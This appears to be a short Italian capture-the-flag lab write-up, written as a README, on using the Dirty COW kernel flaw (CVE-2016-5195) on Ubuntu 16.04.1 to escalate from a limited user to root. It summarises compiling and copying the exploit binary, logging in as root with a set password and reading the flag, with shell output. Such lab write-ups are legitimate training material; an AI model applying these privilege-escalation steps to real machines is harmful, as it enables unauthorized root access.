
Sfruttamento della vulnerabilità Dirty COW (CVE-2016-5195) su Ubuntu 16.04.1.
Sfruttamento della vulnerabilità Dirty COW (CVE-2016-5195) su Ubuntu 16.04.1.
cat > README.md <<'EOF'
Questo laboratorio dimostra lo sfruttamento della vulnerabilità Dirty COW su un sistema Ubuntu Server 16.04.1 con kernel vulnerabile.
L'obiettivo era elevare i privilegi da un utente limitato (student) fino a root e catturare la flag situata in /root/flag.txt.
Linux 4.4.0-31-generic (vulnerabile).ubuntu:16.04 è stato compilato dirtycow_passwd.c → binario dirty.scp dirty student@<IP>:~/.chmod +x ~/dirty && ~/dirty → su root (pass dirtyCowFun).cat /root/flag.txt → 4GEEKS{Y0u_G0t_R00t}.root@ubuntu:/home/student# whoami
root
root@ubuntu:/home/student# id
uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:/home/student# cat /root/flag.txt
4GEEKS{Y0u_G0t_R00t}
Flag ottenuta